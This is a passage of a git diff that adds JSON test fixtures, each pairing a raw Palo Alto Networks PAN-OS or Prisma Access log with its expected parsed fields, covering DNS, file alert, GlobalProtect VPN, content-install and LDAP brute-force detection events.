+    "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"dnsproxy\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"if-inherit\",\"EventComponent\":\"mgmt-obj\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"DNS Proxy object: mgmt-obj inherited following values from dynamic interface: mgmt-if: Primary DNS: 1.2.3.1 Secondary DNS: ::\",\"SequenceNo\":7200776623254142979,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.584000Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "DNS Proxy object: mgmt-obj inherited following values from dynamic interface: mgmt-if: Primary DNS: 1.2.3.1 Secondary DNS: ::",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:31:50Z",
+    "action": {
+      "type": "dnsproxy"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "dnsproxy"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json
new file mode 100644
index 000000000..ce111a3ad
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json	
@@ -0,0 +1,67 @@
+{
+  "input": {
+    "message": "{\"VendorName\":\"test networks\",\"DeviceSN\":\"7FD26D6XXXXXXXX\",\"TimeReceived\":\"2024-07-08T09:01:10.502737Z\",\"LogType\":\"DNS\",\"Subtype\":\"realtime_dns_telemetry_response\",\"SubType\":\"realtime_dns_telemetry_response\",\"TimeGenerated\":\"2024-07-08T09:01:10.000000Z\",\"RecordType\":\"a\",\"DNSResolverIP\":\"1.2.3.4\",\"ThreatID\":0,\"DNSCategory\":\"benign\",\"ThreatName\":null,\"SourceAddress\":\"5.6.7.8\",\"FromZone\":\"trust\",\"Action\":\"Allow\",\"DNSResponse\":[\"8.9.1.2\"],\"ToZone\":null,\"DestinationUser\":null}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"VendorName\":\"test networks\",\"DeviceSN\":\"7FD26D6XXXXXXXX\",\"TimeReceived\":\"2024-07-08T09:01:10.502737Z\",\"LogType\":\"DNS\",\"Subtype\":\"realtime_dns_telemetry_response\",\"SubType\":\"realtime_dns_telemetry_response\",\"TimeGenerated\":\"2024-07-08T09:01:10.000000Z\",\"RecordType\":\"a\",\"DNSResolverIP\":\"1.2.3.4\",\"ThreatID\":0,\"DNSCategory\":\"benign\",\"ThreatName\":null,\"SourceAddress\":\"5.6.7.8\",\"FromZone\":\"trust\",\"Action\":\"Allow\",\"DNSResponse\":[\"8.9.1.2\"],\"ToZone\":null,\"DestinationUser\":null}",
+    "event": {
+      "action": "Allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "dns",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-08T09:01:10Z",
+    "action": {
+      "name": "Allow",
+      "outcome": "success",
+      "type": "realtime_dns_telemetry_response"
+    },
+    "dns": {
+      "question": {
+        "type": "a"
+      },
+      "resolved_ip": [
+        "8.9.1.2"
+      ]
+    },
+    "log": {
+      "logger": "dns"
+    },
+    "observer": {
+      "ingress": {
+        "interface": {
+          "alias": "trust"
+        }
+      },
+      "product": "PAN-OS",
+      "serial_number": "7FD26D6XXXXXXXX"
+    },
+    "paloalto": {
+      "Threat_ContentType": "realtime_dns_telemetry_response",
+      "dns": {
+        "category": "benign"
+      }
+    },
+    "related": {
+      "ip": [
+        "5.6.7.8",
+        "8.9.1.2"
+      ]
+    },
+    "source": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json
new file mode 100644
index 000000000..3142ed671
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json	
@@ -0,0 +1,105 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\": \"2024-02-06T18:17:09.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"file\", \"SubType\": \"file\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-02-06T18:17:02.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"9.10.11.12\", \"NATDestination\": \"5.6.7.8\", \"Rule\": \"Global_Outbound_internet_access\", \"SourceUser\": \"john.doe@example.com\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"trust\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.1\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1450762, \"RepeatCount\": 1, \"SourcePort\": 53514, \"DestinationPort\": 80, \"NATSourcePort\": 22444, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"FileName\": \"some_file_name\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Low\", \"DirectionOfAttack\": \"server to client\", \"SequenceNo\": 7292474944208657622, \"SourceLocation\": \"Prisma-Mobile-Users-EMEA\", \"DestinationLocation\": \"US\", \"PacketID\": 0, \"FileHash\": null, \"ReportID\": 0, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 467, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"GP cloud service\", \"SourceUUID\": null, \"DestinationUUID\": null, \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStartTime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"ContentVersion\": \"577053022\", \"SigFlags\": 0, \"RuleUUID\": \"c38e111b-43fc-4de4-a17c-c372af557193\", \"HTTP2Connection\": 0, \"DynamicUserGroup\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"DomainEDL\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"PartialHash\": 0, \"TimeGeneratedHighResolution\": \"2024-02-06T18:17:02.077000Z\", \"ReasonForDataFilteringAction\": null, \"Justification\": null, \"NSSAINetworkSliceType\": null}"
+  },
+  "expected": {
+    "message": "{\"TimeReceived\": \"2024-02-06T18:17:09.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"file\", \"SubType\": \"file\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-02-06T18:17:02.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"9.10.11.12\", \"NATDestination\": \"5.6.7.8\", \"Rule\": \"Global_Outbound_internet_access\", \"SourceUser\": \"john.doe@example.com\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"trust\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.1\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1450762, \"RepeatCount\": 1, \"SourcePort\": 53514, \"DestinationPort\": 80, \"NATSourcePort\": 22444, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"FileName\": \"some_file_name\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Low\", \"DirectionOfAttack\": \"server to client\", \"SequenceNo\": 7292474944208657622, \"SourceLocation\": \"Prisma-Mobile-Users-EMEA\", \"DestinationLocation\": \"US\", \"PacketID\": 0, \"FileHash\": null, \"ReportID\": 0, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 467, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"GP cloud service\", \"SourceUUID\": null, \"DestinationUUID\": null, \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStartTime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"ContentVersion\": \"577053022\", \"SigFlags\": 0, \"RuleUUID\": \"c38e111b-43fc-4de4-a17c-c372af557193\", \"HTTP2Connection\": 0, \"DynamicUserGroup\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"DomainEDL\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"PartialHash\": 0, \"TimeGeneratedHighResolution\": \"2024-02-06T18:17:02.077000Z\", \"ReasonForDataFilteringAction\": null, \"Justification\": null, \"NSSAINetworkSliceType\": null}",
+    "event": {
+      "action": "alert",
+      "category": [
+        "file"
+      ],
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-02-06T18:17:02Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "file"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "geo": {
+        "country_iso_code": "US"
+      },
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "5.6.7.8",
+        "port": 80
+      },
+      "port": 80
+    },
+    "file": {
+      "name": "some_file_name"
+    },
+    "log": {
+      "hostname": "GP cloud service",
+      "level": "Low",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "web-browsing"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "untrust"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "trust"
+        }
+      },
+      "name": "GP cloud service",
+      "product": "PAN-OS",
+      "serial_number": "no-serial"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "463",
+      "DGHierarchyLevel2": "467",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "DirectionOfAttack": "server to client",
+      "Threat_ContentType": "file",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8",
+        "9.10.11.12"
+      ],
+      "user": [
+        "example.com",
+        "john.doe@example.com"
+      ]
+    },
+    "rule": {
+      "name": "Global_Outbound_internet_access",
+      "uuid": "c38e111b-43fc-4de4-a17c-c372af557193"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "9.10.11.12",
+        "port": 22444
+      },
+      "port": 53514,
+      "user": {
+        "name": "john.doe@example.com"
+      }
+    },
+    "user": {
+      "domain": "john.doe",
+      "email": "john.doe@example.com",
+      "name": "example.com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json
new file mode 100644
index 000000000..f08a677ef
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json	
@@ -0,0 +1,77 @@
+{
+  "input": {
+    "message": "1,2024/01/12 11:41:42,015451000023232323,GLOBALPROTECT,0,2562,2024/01/12 11:41:42,vsys1,gateway-switch-to-ssl,tunnel,,SSLVPN,test.fr\\JDOE,FR,2023-01724,1.2.3.4,0.0.0.0,1.2.3.4,0.0.0.0,662f0b44-e024-4a70,PF000000,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,CD78_VPN_GP_GATEWAY,5555555555555555555,0x8000000000000000,2024-01-12T11:41:43.895+02:00,,,,,,0,0,0,0,,test-01-01,1"
+  },
+  "expected": {
+    "message": "1,2024/01/12 11:41:42,015451000023232323,GLOBALPROTECT,0,2562,2024/01/12 11:41:42,vsys1,gateway-switch-to-ssl,tunnel,,SSLVPN,test.fr\\JDOE,FR,2023-01724,1.2.3.4,0.0.0.0,1.2.3.4,0.0.0.0,662f0b44-e024-4a70,PF000000,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,CD78_VPN_GP_GATEWAY,5555555555555555555,0x8000000000000000,2024-01-12T11:41:43.895+02:00,,,,,,0,0,0,0,,test-01-01,1",
+    "event": {
+      "category": [
+        "session"
+      ],
+      "dataset": "globalprotect",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-01-12T09:41:43.895000Z",
+    "action": {
+      "name": "gateway-switch-to-ssl",
+      "outcome": "success",
+      "type": "0"
+    },
+    "host": {
+      "name": "2023-01724",
+      "os": {
+        "version": "Microsoft Windows 10 Enterprise , 64-bit"
+      }
+    },
+    "log": {
+      "logger": "globalprotect"
+    },
+    "network": {
+      "type": "SSLVPN"
+    },
+    "observer": {
+      "product": "PAN-OS",
+      "serial_number": "PF000000"
+    },
+    "paloalto": {
+      "EventID": "gateway-switch-to-ssl",
+      "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
+      "connection": {
+        "stage": "tunnel"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "JDOE"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "geo": {
+        "country_iso_code": "FR"
+      },
+      "ip": "1.2.3.4",
+      "user": {
+        "domain": "test.fr",
+        "name": "JDOE"
+      }
+    },
+    "user": {
+      "domain": "test.fr",
+      "name": "JDOE"
+    },
+    "user_agent": {
+      "os": {
+        "name": "Windows",
+        "version": "Microsoft Windows 10 Enterprise , 64-bit"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json
new file mode 100644
index 000000000..bbf2d4e97
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json	
@@ -0,0 +1,43 @@
+{
+  "input": {
+    "message": "{\"LogTime\":\"2023-02-16T15:49:04.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:48:57.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Installed contents package: panupv2-all-contents-8676-7858.tgz\",\"SequenceNo\":7200776623254143152,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:48:57.395000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:49:04.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"general\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:48:57.000000Z\",\"VirtualLocation\":\"\",\"EventName\":\"general\",\"EventComponent\":null,\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Installed contents package: panupv2-all-contents-8676-7858.tgz\",\"SequenceNo\":7200776623254143152,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:48:57.395000Z\"}\n",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "contents",
+      "reason": "Installed contents package: panupv2-all-contents-8676-7858.tgz",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:48:57Z",
+    "action": {
+      "type": "general"
+    },
+    "file": {
+      "name": "panupv2-all-contents-8676-7858.tgz"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json
new file mode 100644
index 000000000..aab8fbd6b
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json	
@@ -0,0 +1,89 @@
+{
+  "input": {
+    "message": "1,2024/08/03 12:16:42,012001002253,THREAT,vulnerability,2561,2024/08/03 12:17:45,5.6.7.8,1.2.3.4,0.0.0.0,0.0.0.0,IN_VPN-AZURE-ALSID,,paloaltonetwork\\\\username,ldap,vsys1,VPN,LAN,tunnel.3,ethernet1/4,default,2024/08/03 12:17:45,110079,1,62074,389,0,0,0x80002000,tcp,alert,,LDAP: User Login Brute Force Attempt(40005),any,high,client-to-server,7395125856205392467,0x8000000000000000,192.168.0.0-192.168.255.255,172.16.0.0-172.31.255.255,,,1210225322167894624,,,0,,,,,,,,0,24,315,0,0,,hostname_example,,,,,0,,0,,N/A,brute-force,AppThreat-8877-8886,0x0,0,4294967295,,,2c146dd4-d96a-455f-96fc-7f3e2c37c70d,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-03T12:17:45.360+02:00,,,,auth-service,business-systems,client-server,2,\\\"has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,untunneled,no,no,"
+  },
+  "expected": {
+    "message": "1,2024/08/03 12:16:42,012001002253,THREAT,vulnerability,2561,2024/08/03 12:17:45,5.6.7.8,1.2.3.4,0.0.0.0,0.0.0.0,IN_VPN-AZURE-ALSID,,paloaltonetwork\\\\username,ldap,vsys1,VPN,LAN,tunnel.3,ethernet1/4,default,2024/08/03 12:17:45,110079,1,62074,389,0,0,0x80002000,tcp,alert,,LDAP: User Login Brute Force Attempt(40005),any,high,client-to-server,7395125856205392467,0x8000000000000000,192.168.0.0-192.168.255.255,172.16.0.0-172.31.255.255,,,1210225322167894624,,,0,,,,,,,,0,24,315,0,0,,hostname_example,,,,,0,,0,,N/A,brute-force,AppThreat-8877-8886,0x0,0,4294967295,,,2c146dd4-d96a-455f-96fc-7f3e2c37c70d,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-03T12:17:45.360+02:00,,,,auth-service,business-systems,client-server,2,\\\"has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,untunneled,no,no,",
+    "event": {
+      "action": "alert",
+      "category": [
+        "vulnerability"
+      ],
+      "code": "40005",
+      "dataset": "threat",
+      "outcome": "success",
+      "reason": "LDAP: User Login Brute Force Attempt",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-08-03T10:17:45.360000Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "vulnerability"
+    },
+    "destination": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "port": 389,
+      "user": {
+        "domain": "paloaltonetwork",
+        "name": "username"
+      }
+    },
+    "log": {
+      "hostname": "hostname_example",
+      "level": "high",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "ldap",
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "hostname_example",
+      "product": "PAN-OS",
+      "serial_number": "012001002253"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "24",
+      "DGHierarchyLevel2": "315",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
+      "threat": {
+        "id": "40005",
+        "name": "LDAP: User Login Brute Force Attempt"
+      }
+    },
+    "related": {
+      "ip": [
+        "0.0.0.0",
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "user": [
+        "username"
+      ]
+    },
+    "rule": {
+      "name": "IN_VPN-AZURE-ALSID",
+      "uuid": "2c146dd4-d96a-455f-96fc-7f3e2c37c70d"
+    },
+    "source": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "port": 62074
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json
new file mode 100644
index 000000000..610ab7c24
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json	
@@ -0,0 +1,106 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-07-08T08:33:33.000000Z\",\"DeviceSN\":\"007954000XXXXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"file\",\"SubType\":\"file\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:30:04.000000Z\",\"SourceAddress\":\"4.3.2.1\",\"DestinationAddress\":\"5.2.1.8\",\"NATSource\":\"2.2.1.6\",\"NATDestination\":\"5.2.1.8\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"DTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/1.111\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":6111111,\"RepeatCount\":1,\"SourcePort\":42222,\"DestinationPort\":80,\"NATSourcePort\":22408,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"FileName\":\"test_file.bin\",\"URLCategory\":\"business-and-economy\",\"VendorSeverity\":\"Low\",\"DirectionOfAttack\":\"server to client\",\"SequenceNo\":73503956876,\"SourceLocation\":\"1.2.0.0-1.2.255.255\",\"DestinationLocation\":\"US\",\"PacketID\":0,\"FileHash\":null,\"ReportID\":0,\"DGHierarchyLevel1\":999,\"DGHierarchyLevel2\":1111,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST-F2\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStartTime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ContentVersion\":\"581116536\",\"SigFlags\":0,\"RuleUUID\":\"6935060f-6443-4257-91f8\",\"HTTP2Connection\":0,\"DynamicUserGroup\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":\"1.0.0\",\"SourceDeviceHost\":\"Test-device\",\"SourceDeviceMac\":\"11.22.33.44.55.66\",\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:30:04.855000Z\",\"ReasonForDataFilteringAction\":null,\"Justification\":null,\"NSSAINetworkSliceType\":null}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-07-08T08:33:33.000000Z\",\"DeviceSN\":\"007954000XXXXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"file\",\"SubType\":\"file\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:30:04.000000Z\",\"SourceAddress\":\"4.3.2.1\",\"DestinationAddress\":\"5.2.1.8\",\"NATSource\":\"2.2.1.6\",\"NATDestination\":\"5.2.1.8\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"DTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/1.111\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":6111111,\"RepeatCount\":1,\"SourcePort\":42222,\"DestinationPort\":80,\"NATSourcePort\":22408,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"FileName\":\"test_file.bin\",\"URLCategory\":\"business-and-economy\",\"VendorSeverity\":\"Low\",\"DirectionOfAttack\":\"server to client\",\"SequenceNo\":73503956876,\"SourceLocation\":\"1.2.0.0-1.2.255.255\",\"DestinationLocation\":\"US\",\"PacketID\":0,\"FileHash\":null,\"ReportID\":0,\"DGHierarchyLevel1\":999,\"DGHierarchyLevel2\":1111,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST-F2\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStartTime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ContentVersion\":\"581116536\",\"SigFlags\":0,\"RuleUUID\":\"6935060f-6443-4257-91f8\",\"HTTP2Connection\":0,\"DynamicUserGroup\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":\"1.0.0\",\"SourceDeviceHost\":\"Test-device\",\"SourceDeviceMac\":\"11.22.33.44.55.66\",\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:30:04.855000Z\",\"ReasonForDataFilteringAction\":null,\"Justification\":null,\"NSSAINetworkSliceType\":null}",
+    "event": {
+      "action": "alert",
+      "category": [
+        "file"
+      ],
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-08T15:30:04Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "file"
+    },
+    "destination": {
+      "address": "5.2.1.8",
+      "geo": {
+        "country_iso_code": "US"
+      },
+      "ip": "5.2.1.8",
+      "nat": {
+        "ip": "5.2.1.8",
+        "port": 80
+      },
+      "port": 80
+    },
+    "file": {
+      "name": "test_file.bin"
